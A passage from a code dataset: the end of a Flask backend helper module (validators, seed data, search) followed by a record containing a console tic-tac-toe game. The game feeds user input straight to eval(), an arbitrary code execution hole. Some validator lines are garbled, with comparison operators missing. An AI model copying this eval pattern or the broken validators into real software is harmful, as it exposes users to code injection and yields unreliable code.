QUESTIONS_PER_PAGE = 10\n- def paginate_questions(questions_list,pagination)\n- def question_search(input_text)\n\n\n\"\"\"\n\ntry:\n\tfrom __init__ import *\nexcept:\n\tfrom src import *\n\n\n\nALLOWED_IMAGE_FORMATS=[\"png\",\"jpg\"]\n\n\n\n\nimport json\nfrom flask import Flask, request, jsonify, abort\nimport base64\n# Creatng a function to print the error in an approperiate way\n#with detailed info\ndef my_error(status=404 ,description=\"\"):\n\n\tif status not in [400,401,403,404,405,422,500]:\n\t\traise Exception(\"status is \"+str(status)\n\t\t\t+ \", not in [[400,401,403,404,405,422,500]]\")\n\tif status == 400: message = \"bad request\"\n\telif status == 401: message = \"unauthorized\"\n\telif status == 403: message = \"forbidden\"\n\telif status == 404: message = \"not found\"\n\telif status == 405: message = \"method not allowed\"\n\telif status == 422: message = \"unprocessible\"\n\telse : message = \"internal server error\"\n\n\terror_dict = {\"success\": False,\n\t\t\"error\": status,\"message\": message,}\n\n\tif description == \"\": return jsonify(error_dict),status\n\n\terror_dict[\"description\"] = description\n\treturn jsonify(error_dict),status\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\ndef get_in_stock_products():\n return Product.query.filter(Product.in_stock==True\n ).order_by(Product.id).all()\n\n\n\n\n\n\"\"\"\nThis function has 3 inputs:\n1)\tinput_id: an integer, to be valiudated that\n\t\tit exists or not in the table\n\t\tExample: 1, 2 or 50\n2)\tmodel_query: this is the query of the model\n\t\tExample: Product.query, Order.query\n3)\tname_tring: the name of the table\n\t\tExample: \"product\", \"order\"\n\nOutput:\n-\t{case,result}\ncase:1\n\t-\tSuccessful: id exists\n\t-\tresult = correct output\ncase:2\n\t-\tUnSuccessful: id does not exist\n\t-\tresult = [] (empty list)\n\ncase:3\n\t- \tFailed:\tthere was an error while validating\n\t- \tresult:\terror message\ncase:4\n\t-\tFailed input is none\n\t- \tresult:\tNone\n\n\"\"\"\ndef validate_model_id(input_id,model_query,model_name_string):\n\t#Validate that model id has a value, not None\n\tif input_id == None: return {\"case\":4,\"result\":{\"status\":400,\n\t\t\t\"description\":model_name_string+\n\t\t\t\" is missing\"}}\n\n\t#Validate that model id can be converted to int\n\ttry:\n\t\tid = int(input_id)\n\texcept:\n\t\treturn {\"case\":3,\"result\":{\"status\":400,\n\t\t\t\"description\":model_name_string+\n\t\t\t\" id can not be converted to integer\"}}\n\t\t#[False,my_error(status=400, description=model_name_string+\" id can not be converted to integer\")]\n\n\t#Validate that id is not negative or zero\n\tif id<=0:\n\t\treturn {\"case\":3,\"result\":{\"status\":422,\n\t\t\t\"description\":model_name_string+\n\t\t\t\" id can not be less than\"+\n\t\t\t\" or equal to 0\"}}\n\n\ttry:\n\t\titem = model_query.filter_by(id=id).all()\n\texcept Exception as e:\n\t\treturn {\"case\":3,\"result\":{\"status\":400,\n\t\t\t\"description\":model_name_string+\n\t\t\t\" id can not be converted to integer\"}}\n\tif len(item) == 0 :\n\t\treturn {\"case\":2,\"result\":{\"status\":422,\n\t\t\t\"description\":\"there is no \" +model_name_string+\n\t\t\t\" with this id\"}}\n\n\treturn {\"case\":1,\"result\":item[0]}\n\n\n\n\n\ndef validate_string(input_string,string_name,minimum_length=0,\n\tmax_length=1000000):\n\t#Validate that input has a value, not None\n\tif input_string == None: return {\"case\":3,\"result\":None}\n\n\t#Validate that input can be converted to string\n\ttry:\n\t\tresult = str(input_string)\n\texcept:\n\t\treturn {\"case\":2,\"result\":{\"status\":400,\n\t\t\t\"description\":string_name+\n\t\t\t\" can not be converted to string\"}}\n\n\t#Validate that input length is less that 100\n\tif len(result)>max_length:\n\t\treturn {\"case\":2,\"result\":{\"status\":422,\n\t\t\t\"description\":\"maximum \"+ string_name\n\t\t\t+\" length is \"+str(max_length)+\" letters\"}}\n\n\tif len(result)int(maximum):\n\t\treturn {\"case\":2,\"result\":{\"status\":422,\n\t\t\t\"description\":input_name_string+\n\t\t\t\" can not be more than \"+ str(maximum)}}\n\treturn {\"case\":1,\"result\":result}\n\n\n\ndef validate_float(\n\tinput_float,input_name_string,maximum,minimum):\n\t#Validate that input has a value, not None\n\tif input_float == None: return {\"case\":3,\"result\":None}\n\n\t#Validate that input can be converted to float\n\ttry:\n\t\tresult = float(input_float)\n\texcept:\n\t\treturn {\"case\":2,\"result\":{\"status\":400,\n\t\t\t\"description\":input_name_string+\n\t\t\t\" can not be converted to float\"}}\n\n\t#Validate that input is not less than minimum\n\tif resultfloat(maximum):\n\t\treturn {\"case\":2,\"result\":{\"status\":422,\n\t\t\t\"description\":input_name_string+\n\t\t\t\" can not be more than \"+ str(maximum)}}\n\treturn {\"case\":1,\"result\":result}\n\n\n\ndef validate_base64(\n\tinput_string,input_name_string,maximum_length,minimum_length):\n\t#Validate that input has a value, not None\n\tif input_string == None: return {\"case\":3,\"result\":None}\n\n\t#Validate that input is string\n\tif type(input_string)!= str:\n\t\treturn {\"case\":2,\"result\":{\"status\":400,\n\t\t\t\"description\":input_name_string+\n\t\t\t\" is not a string\"}}\n\n\t#Validate that input length is not less than minimum\n\tif len(input_string)maximum_length:\n\t\treturn {\"case\":2,\"result\":{\"status\":422,\n\t\t\t\"description\":input_name_string+\n\t\t\t\" length can not be more than \"+ str(maximum_length)+ \" characters\"}}\n\n\tvalidation = isBase64(input_string)\n\tif validation == True:\n\t\treturn {\"case\":1,\"result\":input_string}\n\telse:\n\t\treturn {\"case\":2,\"result\":{\"status\":422,\n\t\t\t\"description\":input_name_string+\n\t\t\t\" can not be converted to base64\"}}\n\ndef validate_formatting(input_formatting):\n\tvalidation = validate_string(input_formatting,\"formatting\",minimum_length=2,\n\tmax_length=20)\n\tif validation[\"case\"] != 1:\n\t\treturn validation\n\tinput_formatting = validation[\"result\"]\n\tif input_formatting not in ALLOWED_IMAGE_FORMATS:\n\t\treturn {\"case\":2,\"result\":{\"status\":422,\n\t\t\t\"description\":str(input_formatting)+\" is not allowed image format\"}}\n\treturn {\"case\":1,\"result\":input_formatting}\n\n\n\n\n\n\n\n\"\"\"\ntype:\n\t- \"s\" : String\n\t- \"i\" : Integer\n\t- \"f\" : Float\n\t- \"b\" : Boolean\n\t- \"b64\" : base64\n\t- \"frmt\": Image Formatting\n\n\"\"\"\ndef validate__must(input,type,\n\tinput_name_string,maximum=0,minimum=0):\n\tvalidation=0;\n\tif type == \"s\":\n\t\tvalidation= validate_string(\n\t\t\tinput_string=input,\n\t\t\tmax_length=maximum,string_name=input_name_string,\n\t\t\tminimum_length=minimum)\n\telif type == \"i\":\n\t\tvalidation= validate_integer(\n\tinput_integer=input,input_name_string=input_name_string,\n\tmaximum=maximum,minimum=minimum)\n\telif type == \"f\":\n\t\tvalidation= validate_float(\n\tinput_float=input,input_name_string=input_name_string,\n\tmaximum=maximum,minimum=minimum)\n\telif type == \"b\":\n\t\tvalidation = validate_boolean(input_boolean=input\n\t\t\t,input_name_string=input_name_string)\n\telif type == \"b64\":\n\t\tvalidation = validate_base64(\n\t\t\tinput_string=input,input_name_string=input_name_string,\n\t\t\tmaximum_length=maximum,minimum_length=minimum)\n\telif type == \"frmt\":\n\t\tvalidation = validate_formatting(input_formatting=input)\n\telse:\n\t\traise Exception(\"validate_must: type is\"+str(type)\n\t\t\t+ \"and it can not be like this, it should be: \"+\n\t\t\t\"'s', 'i', 'f' or 'b'\")\n\tif validation[\"case\"] == 1:\n\t\t# Success: correct data type\n\t\treturn {\"case\":True,\n\t\t\"result\": validation[\"result\"]}\n\telif validation[\"case\"] == 2:\n\t\t# Failure: Can't convert to correct data type\n\t\treturn {\"case\":False,\n\t\t\"result\": {\"status\":validation[\"result\"][\"status\"],\n\t\t\t\"description\":validation[\"result\"][\"description\"]}}\n\telse:\n\t\t# no Input is given, result = None\n\t\treturn {\"case\":False,\n\t\t\"result\": {\"status\":400,\"description\":\n\t\t\tinput_name_string+\" is missing\"}}\n\n\n\n\n\ndef validate_must(input,type,\n\tinput_name_string,maximum=0,minimum=0):\n\n\tvalidation=validate__must(input=input,type=type,\n\tinput_name_string=input_name_string,\n\tmaximum=maximum,minimum=minimum)\n\n\tif validation[\"case\"]:\n\t\treturn validation\n\treturn {\"case\":False,\n\t\t\"result\": my_error(\n\t\tstatus=validation[\"result\"][\"status\"]\n\t\t\t,description=validation[\"result\"][\"description\"])}\n\n\n\n\n\ndef validate_must_group(validations_list):\n\tto_return=[]\n\tfor val in validations_list:\n\t\tif val[\"case\"]==True:\n\t\t\tto_return.append(val[\"result\"])\n\t\telse:\n\t\t\treturn {\"case\":False,\"result\":val[\"result\"]}\n\treturn {\"case\":True,\"result\":to_return}\n\n\n\n\n\n\n\n# pass function will validate whther the input is base 64 or not\n# True:base64\n# False:Not base64\ndef isBase64(input_string):\n\tif type(input_string)!=str:\n\t\treturn False\n\tif len(input_string)%4 != 0:\n\t\treturn False\n\tfor char in input_string:\n\t\tbase64_list = [\"a\",\"b\",\"c\",\"d\",\"e\",\"f\",\"g\",\"h\",\"i\",\"j\",\"k\",\"l\",\"m\",\n\t\t\"n\",\"o\",\"p\",\"q\",\"r\",\"s\",\"t\",\"u\",\"v\",\"w\",\"x\",\"y\",\"z\",\n\t\t\"A\",\"B\",\"C\",\"D\",\"E\",\"F\",\"G\",\"H\",\"I\",\"J\",\"K\",\"L\",\"M\",\n\t\t\"N\",\"O\",\"P\",\"Q\",\"R\",\"S\",\"T\",\"U\",\"V\",\"W\",\"X\",\"Y\",\"Z\",\n\t\t\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\",\"0\",\"/\",\"=\",\"+\"]\n\t\tif char not in base64_list:\n\t\t\treturn False\n\treturn True\n\n\n\n\"\"\"\nInputs:\n\t- b64String: This is a string that has been validated to be b64\n\t- formatting: \"png\" ot \"jpg\" or a value in the ALLOWED_IMAGE_FORMATS list\n\"\"\"\ndef b64ToImg(b64String,formatting):\n\treturn \"data:image/\"+formatting+\";base64,\"+b64String\n\n\n\"\"\"\nWe wil see how the frontend handles this first\n\nInputs:\n\t- imgString: a string that has been validated to\n\n\n\ndef imgToB64(imgString):\n\treturn \"data:image/\"+formatting+\";base64,\"+b64String\n\"\"\"\n\n\n\n\ndef db_drop_and_create_all():\n db.drop_all()\n db.create_all()\n\n\n\ndef populate_tables():\n db_drop_and_create_all()\n users = list()\n users.append(User(username=\"abc\",password=\"123456789\"))\n users.append(User(username=\"abcde\",password=\"456abcderrrt\"))\n users.append(User(username=\"klmn\",password=\"fde123987byt\"))\n users.append(User(username=\"rtb\",password=\"uytkltyopi889\"))\n users.append(User(username=\"cool\",password=\"freezererer\"))\n users.append(User(username=\"water\",password=\"TankTankTank\"))\n db.session.add_all(users)\n db.session.commit()\n\n\n products = list()\n products.append(Product(\n name=\"Labtop\", price=300, seller_id=\"1\"))\n products.append(Product(\n name=\"Mobile\", price=100, seller_id=\"2\", in_stock=False))\n products.append(Product(\n name=\"Candy\", price=.5, seller_id=\"3\", in_stock=True))\n products.append(Product(\n name=\"Table\", price=150, seller_id=\"1\", in_stock=False))\n products.append(Product(\n name=\"Keyboard\", price=5, seller_id=\"2\", in_stock=True))\n products.append(Product(\n name=\"Mouse\", price=4, seller_id=\"1\", in_stock=True))\n db.session.add_all(products)\n db.session.commit()\n\n orders = list()\n #id, user, product, amount\n orders.append(Order(user_id=\"1\", product_id=1, amount=1))\n orders.append(Order(user_id=\"2\", product_id=1, amount=4))\n orders.append(Order(user_id=\"3\", product_id=2, amount=3))\n orders.append(Order(user_id=\"1\", product_id=1, amount=2))\n orders.append(Order(user_id=\"2\", product_id=2, amount=1))\n orders.append(Order(user_id=\"2\", product_id=3, amount=5))\n orders.append(Order(user_id=\"1\", product_id=4, amount=20))\n orders.append(Order(user_id=\"3\", product_id=5, amount=4))\n\n db.session.add_all(orders)\n db.session.commit()\n\n images = list()\n #id, user, product, amount\n images.append(Image(seller_id=\"1\", name=\"Labtop\",\n formatting=\"png\"))\n images.append(Image(seller_id=\"2\", name=\"Mobile\",\n formatting=\"jpg\"))\n images.append(Image(seller_id=\"3\", name=\"Lobtop\",\n formatting=\"png\"))\n images.append(Image(seller_id=\"4\", name=\"Mobile\",\n formatting=\"jpg\"))\n images.append(Image(seller_id=\"5\", name=\"Keyboard\",\n formatting=\"png\"))\n images.append(Image(seller_id=\"6\", name=\"Mouse\",\n formatting=\"png\"))\n images.append(Image(seller_id=\"1\", name=\"USB\",\n formatting=\"png\"))\n images.append(Image(seller_id=\"2\", name=\"Notebook\",\n formatting=\"png\"))\n images.append(Image(seller_id=\"3\", name=\"Spoon\",\n formatting=\"jpg\"))\n images.append(Image(seller_id=\"4\", name=\"Fork\",\n formatting=\"png\"))\n images.append(Image(seller_id=\"5\", name=\"Camera\",\n formatting=\"png\"))\n images.append(Image(seller_id=\"6\", name=\"Radio\",\n formatting=\"jpg\"))\n images.append(Image(seller_id=\"1\", name=\"Pen\",\n formatting=\"png\"))\n images.append(Image(seller_id=\"2\", name=\"Back bag\",\n formatting=\"jpg\"))\n images.append(Image(seller_id=\"3\", name=\"Wireless Headphones\",\n formatting=\"png\"))\n\n db.session.add_all(images)\n db.session.commit()\n\n\n\n\n\nQUESTIONS_PER_PAGE = 10\n\n\ndef paginate_questions(questions_list,pagination):\n\t#This function will return a\n\t#(Paginated, fomatted) list of questions\n\tmin_index=(pagination-1) * QUESTIONS_PER_PAGE\n\tmax_index=(pagination) * QUESTIONS_PER_PAGE\n\tpaginated_formatted_questions_list = list()\n\tfor index,question in enumerate(questions_list):\n\t\tif index >= min_index:\n\t\t\tif index < max_index:\n\t\t\t\tpaginated_formatted_questions_list.append(\n\t\t\t\t\tquestion.format())\n\treturn paginated_formatted_questions_list\n\n\n\n\n\n\n\"\"\"\nThis method searches inside The question model.\n\nInput: String to be searched\nOutput: Fomatted list of questions matching the search\n\"\"\"\ndef question_search(input_text):\n\tsearch_query = input_text.strip()\n\t#To remove the spqce from the beginning and the end of string\n\tsearch_query = \"%\"+search_query+\"%\"\n\tall_questions = db.session.query(Question).filter(\n\t\tQuestion.question.ilike(search_query)).all()\n\tto_return = [question.format() for question in all_questions]\n\treturn to_return\n","sub_path":"src/backend/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":15483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"203698578","text":"\"\"\"\nThe Game has a board where each column has a name starting from a -> i, in left -> right order,\nSample input : ['X', 'a'] or ('X', 'a'), where in the list or tuple the first element is the Charecter you have chosen for the \ngame and second element is the column you have choosen for the input.\n\"\"\"\n\n# -------------------------------------- Global Variables -------------------------------------#\nimport random\nimport time\nimport colorama\ncolorama.init()\ndata_dic = {'a': \" \", 'b': \" \", 'c': \" \", 'd': \" \", 'e': \" \", 'f': \" \", 'g': \" \", 'h': \" \", 'i': \" \"}\nChoice_dict = {'Player 1' : \" \", 'Player 2' : \" \", 'Computer': \" \"}\nvar = random.choice(['X','O','$','#','%','&','@'])\nGREEN = '\\u001b[32m'\nYELLOW = '\\u001b[33m'\nRESET = '\\u001b[0m'\nRED = '\\u001b[31m'\nCYAN = '\\u001b[36m'\nMAGENTA = '\\u001b[35m'\nBLUE = '\\u001b[34m'\nBOLD = '\\u001b[1m'\n\n\ndef Notice():\n print(\"\"\"Welcome to the Tic Tac Toe Game,\n by Apurba Ghosh\nThis Game involves two Functionality, 1. Player vs Player \n 2. Player vs Computer\nChoose an Option from 1 or 2 to Start the game, There are some\nfunctionalities to be noticed, if you want to Quit the game at \nany point of time, just type ('exit',) as input, \nRules:\n 1) You can't choose a column already filled, doing that it will\n give a prompt as many times as you do that.\n \n 2) Type your name at the very first starting of the program.\n \n 3) Avoid Choosing the same variable for both the user, if played \n Player vs Player.\n \n 4) You will always have to Give the same Variable which you have \n given as the very first input at the starting of the game, note: \n that you are free to choose any Variables or even numbers and not\n limited to only (X/O). Henceforth, Freedom is granted.\n \\n\\n\"\"\")\n \n\ndef choice():\n x = int(input(\"\"\"1. Player vs Player\n2. Player vs Computer \\t Choose: \"\"\"))\n return (x)\n\n\ndef board(container : str = \"\", screenwidth : int = 59, sign1 = \" \", sign2 = \" \", sign3 = \" \"):\n counter = 0\n while (counter <= 21):\n if (counter == 0 or counter == 14 or counter == 7 or counter == 21):\n container = f\"{YELLOW}-{RESET}\" * screenwidth\n print(container)\n counter += 1\n continue\n \n if (counter == 3):\n container = f\"{YELLOW}|{RESET} {data_dic['a']} {YELLOW}|{RESET} {data_dic['b']} {YELLOW}|{RESET} {data_dic['c']} {YELLOW}|{RESET}\" f\"{sign1}\"\n print(container)\n counter += 1 \n continue\n \n if (counter == 10):\n container = f\"{YELLOW}|{RESET} {data_dic['d']} {YELLOW}|{RESET} {data_dic['e']} {YELLOW}|{RESET} {data_dic['f']} {YELLOW}|{RESET}\" f\"{sign2}\"\n print(container)\n counter += 1\n continue\n \n if (counter == 17):\n container = f\"{YELLOW}|{RESET} {data_dic['g']} {YELLOW}|{RESET} {data_dic['h']} {YELLOW}|{RESET} {data_dic['i']} {YELLOW}|{RESET}\" f\"{sign3}\"\n print(container)\n counter += 1\n continue\n \n else:\n container = f\"{YELLOW}| | | |\"\n print(container)\n counter += 1\n \n \ndef check(a : str ,b : str ,c : str ,d : str ,e : str ,f : str ,g : str ,h : str ,i : str ):\n \n # Part 1:\n if (a == b == c):\n return (a)\n if (d == e == f):\n return (d)\n if (g == h == i):\n return (g)\n \n # Part 2:\n if (a == d == g):\n return (a)\n if (b == e == h):\n return (b)\n if (c == f == i):\n return (c)\n \n # Part 3:\n if (a == e == i):\n return (a)\n if (c == e == g):\n return (c)\n else:\n return (\" \")\n \n \ndef computerOverwrite(user : str):\n if (data_dic[user] != \" \"):\n return (True)\n else:\n return (False)\n\ndef overwrite(user : tuple):\n if (data_dic[user[1]] != \" \"):\n print(f\"{RED}Sorry the Column is already filled, Please Choose any other Column...{RESET}\")\n return (True)\n else:\n return (False)\n\n \ndef game():\n Notice()\n choices = choice()\n name2 = \"\"\n if choices == 2:\n name1 = input('Player 1, Enter Your Name: ')\n else:\n name1 = input('Player 1, Enter Your Name: ')\n name2 = input('Player 2, Enter Your Name: ')\n board()\n winner = \"\"\n counter = 1\n continuous_check = \" \"\n f = \"\"\n while (counter <= 9):\n if (counter%2 != 0):\n user1 = eval(input(\"Player 1, Enter the Cloumn: \"))\n if (user1[0] == 'exit'):\n print(f\"{BLUE}Thanks For Playing{RESET}\")\n f = 'a'\n break\n if (Choice_dict['Player 1'] == \" \"):\n pass\n else:\n if (Choice_dict['Player 1'] == user1[0]):\n pass\n else:\n print(f\"{RED}Sorry You can't take {user1[0]}, You have to choose {Choice_dict['Player 1']}{RESET}\")\n user1 = eval(input(\"Player 1, Enter the Cloumn: \"))\n if (user1[0] == 'exit'):\n print(f\"{BLUE}Thanks For Playing{RESET}\")\n f = 'a'\n break\n while (user1[0] != Choice_dict['Player 1']):\n print(f\"{RED}Sorry You can't take {user1[0]}, You have to choose {Choice_dict['Player 1']}{RESET}\")\n user1 = eval(input(\"Player 1, Enter the Cloumn: \"))\n if (user1[0] == 'exit'):\n print(f\"{BLUE}Thanks For Playing{RESET}\")\n f = 'a'\n break\n if (user1[0] == 'exit'):\n f = 'a'\n break\n else:\n pass\n info = overwrite(user1)\n if (info == True):\n user1 = eval(input(\"Player 1, Enter the Cloumn: \"))\n if (user1[0] == 'exit'):\n print(f\"{BLUE}Thanks For Playing{RESET}\")\n f = 'a'\n break\n while (user1[0] != Choice_dict['Player 1']):\n print(f\"{RED}Sorry You can't take {user1[0]}, You have to choose {Choice_dict['Player 1']}{RESET}\")\n user1 = eval(input(\"Player 1, Enter the Cloumn: \"))\n if (user1[0] == 'exit'):\n print(f\"{BLUE}Thanks For Playing{RESET}\")\n f = 'a'\n break\n if (user1[0] == 'exit'):\n f = 'a'\n break\n info2 = overwrite(user1)\n while (info2 != False):\n user1 = eval(input(\"Player 1, Enter the Cloumn: \"))\n if (user1[0] == 'exit'):\n print(f\"{BLUE}Thanks For Playing{RESET}\")\n f = 'a'\n break\n info2 = overwrite(user1)\n if (Choice_dict['Player 1'] == user1[0]):\n pass\n else:\n print(f\"{RED}Sorry You can't take {user1[0]}, You have to choose {Choice_dict['Player 1']}{RESET}\")\n user1 = eval(input(\"Player 1, Enter the Cloumn: \"))\n if (user1[0] == 'exit'):\n print(f\"{BLUE}Thanks For Playing{RESET}\")\n f = 'a'\n break\n while (user1[0] != Choice_dict['Player 1']):\n print(f\"{RED}Sorry You can't take {user1[0]}, You have to choose {Choice_dict['Player 1']}{RESET}\")\n user1 = eval(input(\"Player 1, Enter the Cloumn: \"))\n if (user1[0] == 'exit'):\n print(f\"{BLUE}Thanks For Playing{RESET}\")\n f = 'a'\n break\n info2 = overwrite(user1)\n \n if (user1[0] == 'exit'):\n f = 'a'\n break \n else:\n pass\n else:\n pass\n \n if (user1[1] == 'a'):\n data_dic['a'] = f\"{RED}{user1[0]}{RESET}\"\n board(sign1=f\"{GREEN} <<--- {RESET}\")\n if (user1[1] == 'b'):\n data_dic['b'] = f\"{RED}{user1[0]}{RESET}\"\n board(sign1=f\"{GREEN} <<--- {RESET}\")\n if (user1[1] == 'c'):\n data_dic['c'] = f\"{RED}{user1[0]}{RESET}\"\n board(sign1=f\"{GREEN} <<--- {RESET}\")\n if (user1[1] == 'd'):\n data_dic['d'] = f\"{RED}{user1[0]}{RESET}\"\n board(sign2=f\"{GREEN} <<--- {RESET}\")\n if (user1[1] == 'e'):\n data_dic['e'] = f\"{RED}{user1[0]}{RESET}\"\n board(sign2=f\"{GREEN} <<--- {RESET}\")\n if (user1[1] == 'f'):\n data_dic['f'] = f\"{RED}{user1[0]}{RESET}\"\n board(sign2=f\"{GREEN} <<--- {RESET}\")\n if (user1[1] == 'g'):\n data_dic['g'] = f\"{RED}{user1[0]}{RESET}\"\n board(sign3=f\"{GREEN} <<--- {RESET}\")\n if (user1[1] == 'h'):\n data_dic['h'] = f\"{RED}{user1[0]}{RESET}\"\n board(sign3=f\"{GREEN} <<--- {RESET}\")\n if (user1[1] == 'i'):\n data_dic['i'] = f\"{RED}{user1[0]}{RESET}\"\n board(sign3=f\"{GREEN} <<--- {RESET}\")\n Choice_dict['Player 1'] = user1[0]\n winner = check(data_dic['a'],data_dic['b'],data_dic['c'],data_dic['d'],data_dic['e'],data_dic['f']\n ,data_dic['g'],data_dic['h'],data_dic['i'])\n if (winner != \" \"):\n continuous_check = (True,winner)\n break\n else:\n if choices == 2:\n print(\"Computer's Turn...\")\n column = ''\n for j in range(1):\n column = random.choice(['a','b','c','d','e','f','g','h','i'])\n info = computerOverwrite(column)\n while (info != False):\n column = random.choice(['a','b','c','d','e','f','g','h','i'])\n info = computerOverwrite(column)\n if (column == 'a'):\n data_dic['a'] = f\"{CYAN}{var}{RESET}\"\n board(sign1=f\"{YELLOW} <<--- {RESET}\")\n if (column == 'b'):\n data_dic['b'] = f\"{CYAN}{var}{RESET}\"\n board(sign1=f\"{YELLOW} <<--- {RESET}\")\n if (column == 'c'):\n data_dic['c'] = f\"{CYAN}{var}{RESET}\"\n board(sign1=f\"{YELLOW} <<--- {RESET}\")\n if (column == 'd'):\n data_dic['d'] = f\"{CYAN}{var}{RESET}\"\n board(sign2=f\"{YELLOW} <<--- {RESET}\")\n if (column == 'e'):\n data_dic['e'] = f\"{CYAN}{var}{RESET}\"\n board(sign2=f\"{YELLOW} <<--- {RESET}\")\n if (column == 'f'):\n data_dic['f'] = f\"{CYAN}{var}{RESET}\"\n board(sign2=f\"{YELLOW} <<--- {RESET}\")\n if (column == 'g'):\n data_dic['g'] = f\"{CYAN}{var}{RESET}\"\n board(sign3=f\"{YELLOW} <<--- {RESET}\")\n if (column == 'h'):\n data_dic['h'] = f\"{CYAN}{var}{RESET}\"\n board(sign3=f\"{YELLOW} <<--- {RESET}\")\n if (column == 'i'):\n data_dic['i'] = f\"{CYAN}{var}{RESET}\"\n board(sign3=f\"{YELLOW} <<--- {RESET}\")\n winner = check(data_dic['a'],data_dic['b'],data_dic['c'],data_dic['d'],data_dic['e'],data_dic['f']\n ,data_dic['g'],data_dic['h'],data_dic['i'])\n Choice_dict['Computer'] = var\n if (winner != \" \"):\n continuous_check = (True,winner)\n break\n else:\n user2 = eval(input(\"Player 2, Enter the Cloumn: \"))\n if (user2[0] == 'exit'):\n print(f\"{BLUE}Thanks For Playing{RESET}\")\n f = 'b'\n break\n if (Choice_dict['Player 2'] == \" \"):\n pass\n else:\n if (Choice_dict['Player 2'] == user2[0]):\n pass\n else:\n print(f\"{RED}Sorry You can't take {user2[0]}, You have to choose {Choice_dict['Player 2']}{RESET}\")\n user2 = eval(input(\"Player 2, Enter the Cloumn: \"))\n if (user2[0] == 'exit'):\n print(f\"{BLUE}Thanks For Playing{RESET}\")\n f = 'b'\n break\n while (user2[0] != Choice_dict['Player 2']):\n print(f\"{RED}Sorry You can't take {user2[0]}, You have to choose {Choice_dict['Player 2']}{RESET}\")\n user2 = eval(input(\"Player 2, Enter the Cloumn: \"))\n if (user2[0] == 'exit'):\n print(f\"{BLUE}Thanks For Playing{RESET}\")\n f = 'b'\n break\n if (user2[0] == 'exit'):\n f = 'b'\n break\n else:\n pass\n info = overwrite(user2)\n if (info == True):\n user2 = eval(input(\"Player 2, Enter the Cloumn: \"))\n if (user2[0] == 'exit'):\n print(f\"{BLUE}Thanks For Playing{RESET}\")\n f = 'b'\n break\n while (user2[0] != Choice_dict['Player 2']):\n print(f\"{RED}Sorry You can't take {user2[0]}, You have to choose {Choice_dict['Player 2']}{RESET}\")\n user2 = eval(input(\"Player 2, Enter the Cloumn: \"))\n if (user2[0] == 'exit'):\n print(f\"{BLUE}Thanks For Playing{RESET}\")\n f = 'b'\n break\n if (user2[0] == 'exit'):\n f = 'b'\n break\n info2 = overwrite(user2)\n while (info2 != False):\n user2 = eval(input(\"Player 2, Enter the Cloumn: \"))\n if (user2[0] == 'exit'):\n print(f\"{BLUE}Thanks For Playing{RESET}\")\n f = 'b'\n break\n info2 = overwrite(user2)\n if (Choice_dict['Player 2'] == user2[0]):\n pass\n else:\n print(f\"{RED}Sorry You can't take {user2[0]}, You have to choose {Choice_dict['Player 2']}{RESET}\")\n user2 = eval(input(\"Player 2, Enter the Cloumn: \"))\n if (user2[0] == 'exit'):\n print(f\"{BLUE}Thanks For Playing{RESET}\")\n f = 'b'\n break\n while (user2[0] != Choice_dict['Player 2']):\n print(f\"{RED}Sorry You can't take {user2[0]}, You have to choose {Choice_dict['Player 2']}{RESET}\")\n user2 = eval(input(\"Player 2, Enter the Cloumn: \"))\n if (user2[0] == 'exit'):\n print(f\"{BLUE}Thanks For Playing{RESET}\")\n f = 'b'\n break\n info2 = overwrite(user2)\n \n if (user2[0] == 'exit'):\n f = 'b'\n break \n else:\n pass\n else:\n pass\n \n if (user2[1] == 'a'):\n data_dic['a'] = f\"{CYAN}{user2[0]}{RESET}\"\n board(sign1=f\"{YELLOW} <<--- {RESET}\")\n if (user2[1] == 'b'):\n data_dic['b'] = f\"{CYAN}{user2[0]}{RESET}\"\n board(sign1=f\"{YELLOW} <<--- {RESET}\")\n if (user2[1] == 'c'):\n data_dic['c'] = f\"{CYAN}{user2[0]}{RESET}\"\n board(sign1=f\"{YELLOW} <<--- {RESET}\")\n if (user2[1] == 'd'):\n data_dic['d'] = f\"{CYAN}{user2[0]}{RESET}\"\n board(sign2=f\"{YELLOW} <<--- {RESET}\")\n if (user2[1] == 'e'):\n data_dic['e'] = f\"{CYAN}{user2[0]}{RESET}\"\n board(sign2=f\"{YELLOW} <<--- {RESET}\")\n if (user2[1] == 'f'):\n data_dic['f'] = f\"{CYAN}{user2[0]}{RESET}\"\n board(sign2=f\"{YELLOW} <<--- {RESET}\")\n if (user2[1] == 'g'):\n data_dic['g'] = f\"{CYAN}{user2[0]}{RESET}\"\n board(sign3=f\"{YELLOW} <<--- {RESET}\")\n if (user2[1] == 'h'):\n data_dic['h'] = f\"{CYAN}{user2[0]}{RESET}\"\n board(sign3=f\"{YELLOW} <<--- {RESET}\")\n if (user2[1] == 'i'):\n data_dic['i'] = f\"{CYAN}{user2[0]}{RESET}\"\n board(sign3=f\"{YELLOW} <<--- {RESET}\")\n \n Choice_dict['Player 2'] = user2[0]\n winner = check(data_dic['a'],data_dic['b'],data_dic['c'],data_dic['d'],data_dic['e'],data_dic['f']\n ,data_dic['g'],data_dic['h'],data_dic['i'])\n if (winner != \" \"):\n continuous_check = (True,winner)\n break\n\n\n counter += 1\n \n \n if f == 'a' or f == 'b':\n pass\n else:\n if (continuous_check[0] == True):\n key_list = list(Choice_dict.keys())\n value_list = list(Choice_dict.values())\n if (choices == 2):\n position1 = value_list.index('X')\n position2 = value_list.index(var) \n else:\n position1 = value_list.index('X')\n position2 = value_list.index('O') \n if (continuous_check[1] == f'{RED}X{RESET}'):\n if choices == 2:\n if (key_list[position1] == \"Player 1\"):\n print(f\"{MAGENTA}Congratulations! Winner of the Game is{BOLD} {name1}\")\n else:\n print(f\"{MAGENTA}Congratulations! Winner of the Game is{BOLD} Computer.\")\n else:\n if (key_list[position1] == \"Player 1\"):\n print(f\"{MAGENTA}Congratulations! Winner of the Game is{BOLD} {name1}\")\n else:\n print(f\"{MAGENTA}Congratulations! Winner of the Game is{BOLD} {name2}\")\n else:\n if choices == 2:\n if (key_list[position2] == \"Player 1\"):\n print(f\"{MAGENTA}Congratulations! Winner of the Game is{BOLD} {name1}\")\n else:\n print(f\"{MAGENTA}Congratulations! Winner of the Game is{BOLD} Computer.\")\n else:\n if (key_list[position2] == \"Player 1\"):\n print(f\"{MAGENTA}Congratulations! Winner of the Game is{BOLD} {name1}\")\n else:\n print(f\"{MAGENTA}Congratulations! Winner of the Game is{BOLD} {name2}\")\n \n else:\n pass\nif __name__ == 